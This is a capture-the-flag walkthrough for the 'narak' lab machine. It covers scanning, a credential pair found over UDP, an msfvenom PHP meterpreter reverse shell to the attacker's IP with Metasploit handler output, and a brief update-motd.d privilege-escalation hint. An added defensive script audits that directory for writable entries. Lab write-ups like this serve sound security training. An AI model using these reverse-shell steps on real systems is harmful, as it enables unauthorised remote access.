narak
Getting a shell
Information gathering
Start with an nmap scan
Wappalyzer
dirb
Found tips.txt and http://192.168.10.157/webdav/
View tips.txt
Hint to open the door of narak can be found in creds.txt.
creds.txt could not be found
Scan again, this time over UDP
Ports 68 and 69 are open
Obtained yamdoot:Swarg
These credentials log in to http://192.168.10.157/webdav/
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.10.241 LPORT=5820 -f raw > shell.php
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set LPORT 5820
LPORT => 5820
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:5820
[*] Meterpreter session 1 opened (192.168.10.241:5820 -> 192.168.10.157:38638) at 2020-10-04 15:39:27 +0800
meterpreter >
Privilege escalation
Obtained www-data privileges
update-motd.d
When connecting to the host with telnet, the host's login screen will display
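
A defender-side check for the update-motd.d step above, as an added example that is not part of the original writeup: on Debian/Ubuntu systems the scripts in /etc/update-motd.d are run as root by pam_motd at login, so any entry there that a non-root account can modify is a privilege-escalation path. The function name audit_motd and its two arguments are assumptions made for this example.

```shell
#!/bin/sh
# audit_motd [DIR] [OWNER_UID]
# Lists entries under DIR (default /etc/update-motd.d) that someone other
# than OWNER_UID (default 0, root) could modify.
# Output: one "<reason> <path>" line per finding.
# Return: 0 = clean, 1 = findings, 2 = directory missing.
audit_motd() {
    am_dir=${1:-/etc/update-motd.d}
    am_owner=${2:-0}

    if [ ! -d "$am_dir" ]; then
        echo "missing $am_dir"
        return 2
    fi

    # -L follows symlinks, so a link pointing at a writable file elsewhere
    # is judged by its target, which is what actually gets executed.
    am_findings=$(
        # Not owned by the expected account: the owner can rewrite it.
        find -L "$am_dir" \( -type f -o -type d \) ! -user "$am_owner" -print \
            | sed 's/^/owner /'
        # Group-writable: any member of the file's group can rewrite it.
        find -L "$am_dir" \( -type f -o -type d \) -perm -020 -print \
            | sed 's/^/group-writable /'
        # World-writable: any local account, www-data included, can rewrite it.
        find -L "$am_dir" \( -type f -o -type d \) -perm -002 -print \
            | sed 's/^/world-writable /'
    )

    if [ -z "$am_findings" ]; then
        return 0
    fi
    printf '%s\n' "$am_findings"
    return 1
}

# Usage on a live host (run as root so every entry is readable):
#   audit_motd /etc/update-motd.d
```

Every reported path should be returned to root ownership with mode 755 or stricter, and the directory itself is checked too, because write access to it allows adding or replacing scripts.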